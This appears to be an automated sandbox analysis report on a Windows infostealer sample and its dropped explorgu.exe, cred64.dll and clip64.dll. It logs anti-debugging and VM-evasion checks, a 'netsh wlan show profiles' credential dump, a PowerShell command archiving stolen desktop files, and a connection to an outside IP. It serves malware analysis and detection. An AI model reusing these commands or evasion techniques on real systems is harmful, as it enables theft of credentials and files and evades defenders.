                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED07FC second address: 4ED0836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FED74F3E51Bh 0x0000000d mov ebp, esp 0x0000000f jmp 00007FED74F3E526h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FED74F3E51Ah 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0836 second address: 4ED083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED083A second address: 4ED0840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E700F6 second address: 4E700FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E700FA second address: 4E70100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70100 second address: 4E70106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E70106 second address: 4E7015C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FED74F3E51Fh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dx, cx 0x00000013 push ecx 0x00000014 mov bx, F952h 0x00000018 pop edi 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007FED74F3E526h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FED74F3E527h 0x00000029 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4E7015C second address: 4E70163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0BB0 second address: 4ED0BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E523h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED74F3E526h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FED74F3E527h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0BF9 second address: 4ED0C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007FED7550886Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007FED75508870h 0x00000019 push F3EDA717h 0x0000001e jmp 00007FED75508871h 0x00000023 add dword ptr [esp], 0C1358EBh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d call 00007FED75508873h 0x00000032 pop ecx 0x00000033 movsx edx, cx 0x00000036 popad 0x00000037 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0C72 second address: 4ED0C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0C78 second address: 4ED0C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0C9B second address: 4ED0C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0C9F second address: 4ED0CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0CA5 second address: 4ED0CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov al, A2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a movzx eax, al 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0CB8 second address: 4ED0CBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0CBE second address: 4ED0CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E528h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 4ED0CDA second address: 4ED0CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Tries to evade debugger and weak emulator (self modifying code)
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSpecial instruction interceptor: First address: 54BB5F instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSpecial instruction interceptor: First address: 54BA89 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSpecial instruction interceptor: First address: 6F2A0A instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSpecial instruction interceptor: First address: 6F983A instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSpecial instruction interceptor: First address: 77998A instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSpecial instruction interceptor: First address: 30BB5F instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSpecial instruction interceptor: First address: 30BA89 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSpecial instruction interceptor: First address: 4B2A0A instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSpecial instruction interceptor: First address: 4B983A instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeSpecial instruction interceptor: First address: 53998A instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_04ED0C6D rdtsc 0_2_04ED0C6D
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow / User API: threadDelayed 1123Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow / User API: threadDelayed 1032Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow / User API: threadDelayed 1032Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow / User API: threadDelayed 1008Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 9994Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4653Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5194Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7936Thread sleep time: -44022s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7928Thread sleep count: 1123 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7928Thread sleep time: -2247123s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7932Thread sleep count: 1032 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7932Thread sleep time: -2065032s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7892Thread sleep count: 287 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7892Thread sleep time: -8610000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 8008Thread sleep time: -180000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920Thread sleep count: 1032 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920Thread sleep time: -2065032s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920Thread sleep count: 1008 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920Thread sleep time: -2017008s >= -30000sJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 2008Thread sleep count: 9994 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 2008Thread sleep time: -9994000s >= -30000sJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                                Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E22BA2F FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,10_2_6E22BA2F
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeThread delayed: delay time: 30000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior
                                Source: explorgu.exe, explorgu.exe, 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08E60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp, explorgu.exe, 00000005.00000002.2870677611.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2064247735.0000029F08E72000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.000000000332A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.0000000003389000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: wIaKimJFke.exe, 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmp, explorgu.exe, 00000001.00000002.1694186183.000000000048F000.00000040.00000001.01000000.00000007.sdmp, explorgu.exe, 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                                Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW#
                                Source: netsh.exe, 00000008.00000003.1991253555.0000028334A06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeSystem information queried: ModuleInformationJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Hides threads from debuggers
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeThread information set: HideFromDebuggerJump to behavior
                                Potentially malicious time measurement code found
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_04ED0CC7 Start: 04ED0CDA End: 04ED0CDE0_2_04ED0CC7
                                Tries to detect sandboxes and other dynamic analysis tools (window names)
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeOpen window title or class name: regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeOpen window title or class name: gbdyllo
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeOpen window title or class name: procmon_window_class
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeOpen window title or class name: filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeFile opened: NTICE
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeFile opened: SICE
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeFile opened: SIWVID
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_04ED0C6D rdtsc 0_2_04ED0C6D
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E226871 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6E226871
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_00515E8B mov eax, dword ptr fs:[00000030h]0_2_00515E8B
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_00519B02 mov eax, dword ptr fs:[00000030h]0_2_00519B02
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeCode function: 5_2_002D5E8B mov eax, dword ptr fs:[00000030h]5_2_002D5E8B
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeCode function: 5_2_002D9B02 mov eax, dword ptr fs:[00000030h]5_2_002D9B02
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E229EDF mov eax, dword ptr fs:[00000030h]10_2_6E229EDF
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E22B511 mov eax, dword ptr fs:[00000030h]10_2_6E22B511
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E22CEA4 GetProcessHeap,10_2_6E22CEA4
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E226871 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6E226871
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E2294D4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6E2294D4
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E22610D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6E22610D

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.215.113.32 80Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, MainJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, MainJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
                                Source: explorgu.exe, explorgu.exe, 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_004FCD47 cpuid 0_2_004FCD47
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeQueries volume information: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeQueries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeQueries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeQueries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeQueries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\AIXACVYBSB.docx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\AIXACVYBSB.xlsx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NHPKIZUUSG.docx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
